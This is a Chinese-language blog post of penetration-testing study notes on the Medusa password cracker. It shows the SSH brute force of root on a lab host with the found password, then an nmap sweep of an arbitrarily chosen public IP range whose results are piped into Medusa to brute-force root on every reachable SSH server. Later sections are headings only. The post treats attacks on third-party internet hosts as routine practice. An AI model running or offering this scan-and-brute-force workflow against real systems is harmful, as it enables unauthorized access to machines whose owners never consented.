• kali 系列学习06


    参考书 《kali linux渗透测试技术详解》 清华大学出版社  2015 杨波

    一、medusa使用

    原理:并行登陆破解

    1、只输入单个命令,是查看帮助

    root@kali:/tools/mima# medusa

           我们看看medusa有哪些模块支持什么功能的破解
           root@perl-exploit:/pentest/exploits/framework3# medusa -d

    Available modules in "/usr/lib/medusa/modules" :
    + cvs.mod : Brute force module for CVS sessions : version 1.0.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
    + http.mod : Brute force module for HTTP : version 1.3.0
    + imap.mod : Brute force module for IMAP sessions : version 1.2.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
    + mysql.mod : Brute force module for MySQL sessions : version 1.2
    + ncp.mod : Brute force module for NCP sessions : version 1.0.0
    + nntp.mod : Brute force module for NNTP sessions : version 1.0.0
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
    + pop3.mod : Brute force module for POP3 sessions : version 1.2
    + postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
    + rexec.mod : Brute force module for REXEC sessions : version 1.1.1
    + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
    + rsh.mod : Brute force module for RSH sessions : version 1.0.1
    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
    + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
    + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
    + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
    + svn.mod : Brute force module for Subversion sessions : version 1.0.0
    + telnet.mod : Brute force module for telnet sessions : version 1.2.2
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
    + vnc.mod : Brute force module for VNC sessions : version 1.0.1
    + web-form.mod : Brute force module for web forms : version 1.0.0
    + wrapper.mod : Generic Wrapper Module : version 1.0.1


    恩,我们要破解ssh,所以用-M ssh参数加载ssh模块,后面不用跟.mod

    2、用口令文件破解单个IP,破解成功后会退出

    root@kali:/tools/mima# medusa -h 192.168.80.131 -u root -P rkl.txt -M ssh

    ....
    
    ACCOUNT CHECK: [ssh] Host: 192.168.80.131 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 12345 (28 of 2108 complete)
    ACCOUNT CHECK: [ssh] Host: 192.168.80.131 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (29 of 2108 complete)
    ACCOUNT FOUND: [ssh] Host: 192.168.80.131 User: root Password: 123456 [SUCCESS]

    3、结合nmap、cut

    首先我们确定目标,扫描开放ssh的机器,随便找个段扫描一下吧
    root@perl-exploit:/pentest# nmap -sV -p22 -oG ssh 69.163.190.0/24

    Host: 69.163.190.8 (ps10854.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
    Host: 69.163.190.9 (rangerjill.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/

    然后是漫长的等待,上面的参数扫描意思是,扫描整个段开了22端口的机器,并且判断服务版本,保存到ssh文件中。
    类似这样的,这里我们要整理一下,把开了ssh的IP整理出来,现在明白oG保存的意义所在了
    root@perl-exploit:/pentest# grep 22/open ssh | cut -d " " -f 2 >>ssh1.txt
    root@perl-exploit:/pentest# medusa -H ssh1.txt -u root -P p.txt -M ssh

    二、HASH暴力破解工具-Hashcat

    http://www.sohu.com/a/248610818_609556

    三、在线密码破解之hydra

    四、rar密码破解之rarcrack

    五、zip密码破解之fcrackzip

  • 相关阅读:
    Erlang学习笔记2
    erlang的Socket参数含义
    Erlang 日期和时间处理、时间戳转换
    图(有向)-拓扑排序
    图(无向连通无权图)-广度优先搜索
    图(无向连通无权图)-深度优先搜索
    图(无向连通无权值图)深度优先生成最小生成树
    客户关系管理系统
    字符串类
    I/O流
  • 原文地址:https://www.cnblogs.com/micfox/p/11044647.html
Copyright © 2020-2023  润新知